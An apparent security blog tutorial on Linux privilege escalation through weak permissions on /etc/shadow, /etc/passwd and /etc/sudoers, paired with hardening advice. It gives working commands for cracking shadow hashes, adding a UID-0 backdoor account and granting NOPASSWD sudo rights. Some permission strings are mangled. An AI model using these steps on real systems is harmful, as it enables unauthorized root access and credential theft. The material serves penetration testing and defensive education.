Listen to this Post

Introduction:
In the realm of Linux security, privilege escalation remains a crown jewel for attackers, and weak file permissions on critical system files are among the most straightforward paths to root compromise. Misconfigurations in files like /etc/passwd, /etc/shadow, and `/etc/sudoers` can transform a low-privileged user account into a full system takeover, exposing hashes, allowing backdoor insertion, or granting instant sudo rights. This article delves into the technical exploitation and hardening of these vectors, providing a hands-on guide for both offensive security professionals and defensive system administrators.
Learning Objectives:
- Identify and exploit weak permissions on
/etc/shadow,/etc/passwd, and `/etc/sudoers` to escalate privileges to root. - Utilize tools like
john,hashcat, and LinPEAS for hash cracking and automated vulnerability detection. - Implement robust hardening measures to mitigate these risks and secure Linux environments against such attacks.
You Should Know:
- The Foundation: Linux File Permissions and Critical System Files
Linux file permissions are defined by read (r), write (w), and execute (x) bits for owner, group, and others. Critical authentication files must have strict permissions: `/etc/passwd` (readable by all, writable only by root), `/etc/shadow` (readable/writable only by root), and `/etc/sudoers` (readable/writable only by root). Misconfigurations, often due to administrative errors or inherited insecure setups, can lead to catastrophic breaches.
Step‑by‑step guide explaining what this does and how to use it:
– Step 1: Check current permissions using ls -l /etc/passwd /etc/shadow /etc/sudoers. Expected output: `-rw-r–r–` for /etc/passwd, `-rw-r–` or more restrictive for /etc/shadow, and `-r–r–` for /etc/sudoers.
– Step 2: Understand numeric permissions: For example, `chmod 644 /etc/passwd` sets owner read-write, group read, others read. `/etc/shadow` should be `640` (owner root, group shadow) or 400.
– Step 3: Identify weak permissions: If `/etc/shadow` is world-readable (e.g., -rw-r--r--), any user can extract password hashes. Use `ls -l /etc/shadow | cut -d ‘ ‘ -f1` to quickly audit.
- Exploiting Readable /etc/shadow for Hash Extraction and Cracking
When `/etc/shadow` is readable, attackers can copy the file and extract password hashes for offline cracking. This file contains salted SHA-512 hashes (by default on modern systems) for each user, which, if weak, can be cracked to reveal plaintext passwords.
Step‑by‑step guide explaining what this does and how to use it:
– Step 1: As a low-privileged user, verify readability: cat /etc/shadow. If successful, copy the file: cp /etc/shadow /tmp/shadow_backup.
– Step 2: Extract hashes using `unshadow` from John the Ripper suite: unshadow /etc/passwd /tmp/shadow_backup > /tmp/hashes.txt. This combines files for cracking.
– Step 3: Crack hashes with John the Ripper: john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/hashes.txt. For faster cracking, use GPU-assisted tools like hashcat: `hashcat -m 1800 -a 0 /tmp/hashes.txt /usr/share/wordlists/rockyou.txt` (where `-m 1800` is SHA-512 Unix mode).
- Gaining Root via Writable /etc/passwd: Passwordless Backdoor Insertion
The `/etc/passwd` file historically contained password hashes, but now holds user account info. If writable, attackers can add a new root user with a known password or modify UID/GID to zero for existing users, granting root privileges without authentication.
Step‑by‑step guide explaining what this does and how to use it:
– Step 1: Check writability: [ -w /etc/passwd ] && echo "Writable". If true, proceed.
– Step 2: Generate a password hash for a new root user. Use `openssl` to create a salted hash: openssl passwd -6 -salt xyz mypassword. Outputs a SHA-512 hash like $6$xyz$....
– Step 3: Append a new root entry to /etc/passwd: echo "backdoor:\$6\$xyz\$...:0:0:root:/root:/bin/bash" >> /etc/passwd. This creates user “backdoor” with UID 0 (root), password “mypassword”.
– Step 4: Switch to the new user: su backdoor, enter password, and verify root with id.
4. Instant Sudo Rights through Writable /etc/sudoers
The `/etc/sudoers` file, managed by visudo, defines sudo privileges. If writable, attackers can add rules to grant any user passwordless sudo access to all commands, effectively providing root execution.
Step‑by‑step guide explaining what this does and how to use it:
– Step 1: Confirm writability: ls -l /etc/sudoers. If permissions are lax (e.g., -rw-rw-rw-), exploit.
– Step 2: Backup the original file: cp /etc/sudoers /tmp/sudoers.bak.
– Step 3: Edit `/etc/sudoers` directly: `echo “www-data ALL=(ALL) NOPASSWD:ALL” >> /etc/sudoers` (assuming `www-data` is the current user). This allows `www-data` to run any command as root without a password.
– Step 4: Execute root commands: `sudo whoami` should return root. Always restore permissions after testing: chmod 440 /etc/sudoers.
- Automated Detection with LinPEAS and Privilege Escalation Scripts
Manual checks are tedious; automated tools like LinPEAS (Linux Privilege Escalation Awesome Script) scan for misconfigurations, including file permissions, and highlight exploitability. This script is part of the PEASS-ng suite and is widely used in penetration testing.
Step‑by‑step guide explaining what this does and how to use it:
– Step 1: Download LinPEAS on the target machine. Use `wget` or curl: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh.
– Step 2: Make it executable: chmod +x /tmp/linpeas.sh.
– Step 3: Run the script: /tmp/linpeas.sh. It will output color-coded results—red for high-risk findings like writable /etc/shadow.
– Step 4: Review the “Interesting Files” section for permission issues. LinPEAS also checks sudo rules, cron jobs, and kernel vulnerabilities.
- Hardening Linux Systems: Mitigating Weak File Permission Risks
Proactive hardening is essential to prevent exploitation. This involves setting strict permissions, using auditing tools, and implementing least-privilege principles.
Step‑by‑step guide explaining what this does and how to use it:
– Step 1: Set correct permissions: chmod 644 /etc/passwd, chmod 640 /etc/shadow, chmod 440 /etc/sudoers. Ensure ownership: `chown root:root /etc/passwd /etc/shadow /etc/sudoers` and chown root:shadow /etc/shadow.
– Step 2: Install and configure auditd for monitoring: `sudo apt install auditd` (Debian/Ubuntu). Add rules to watch critical files: auditctl -w /etc/shadow -p wa -k shadow_file. This logs write or attribute changes.
– Step 3: Use SELinux or AppArmor to enforce mandatory access control. For SELinux, check status: sestatus. To enforce, edit `/etc/selinux/config` and set SELINUX=enforcing.
– Step 4: Regular audits with tools like Lynis: lynis audit system. It provides hardening recommendations and checks file permissions.
7. Cross-Platform Considerations: Windows Analogues and Cloud Implications
While focused on Linux, similar principles apply to Windows (e.g., weak ACLs on SAM files) and cloud environments (e.g., misconfigured IAM roles). Understanding these parallels broadens defense strategies.
Step‑by‑step guide explaining what this does and how to use it:
– Step 1: On Windows, the SAM database stores hashes. If accessible, tools like mimikatz can extract them. Mitigate by restricting access to `C:\Windows\System32\config\SAM` via ACLs: icacls SAM /deny Everyone:(R).
– Step 2: In cloud (e.g., AWS), ensure instance metadata service (IMDS) is not overly permissive. Use `curl http://169.254.169.254/latest/meta-data/` to check; restrict with IMDSv2 and IAM policies.
– Step 3: Implement infrastructure-as-code security scanning with tools like Checkov or Terraform, to detect lax permissions in configuration files before deployment.
What Undercode Say:
- Key Takeaway 1: Weak file permissions on Linux authentication files are low-hanging fruit that can lead to immediate root compromise, often due to human error or legacy systems. Exploitation requires minimal skill but yields maximum impact, making it a favorite in penetration testing and real-world attacks.
- Key Takeaway 2: Defense-in-depth is critical: combining strict permission settings with automated monitoring and mandatory access controls can thwart these attacks. Tools like LinPEAS for detection and auditd for logging are essential for maintaining visibility and response capabilities.
Analysis: The prevalence of such misconfigurations underscores a gap in basic system hardening, especially in DevOps and cloud environments where rapid deployment may overlook security baselines. As Linux powers most servers and containers, these vectors pose significant risks to data integrity and service availability. Organizations must prioritize permission audits in their security pipelines, integrating checks into CI/CD processes. Moreover, the rise of AI-driven security tools could automate exploitation detection, but equally, attackers may leverage AI to scan for these flaws at scale, escalating the arms race.
Prediction:
Looking ahead, weak file permission exploits will persist in hybrid and multi-cloud environments, particularly as containerization and ephemeral instances complicate consistent security enforcement. Attackers will increasingly use AI to identify misconfigurations in real-time, while defenders will adopt AI-powered hardening platforms that auto-remediate permissions. Furthermore, regulatory frameworks may mandate stricter file permission controls, driving compliance-driven security investments. Ultimately, as Linux continues to dominate enterprise infrastructure, these fundamental flaws will remain a critical pivot point in cyber attacks, emphasizing the need for continuous education and automated security practices.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Khushimistry132 Linux – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


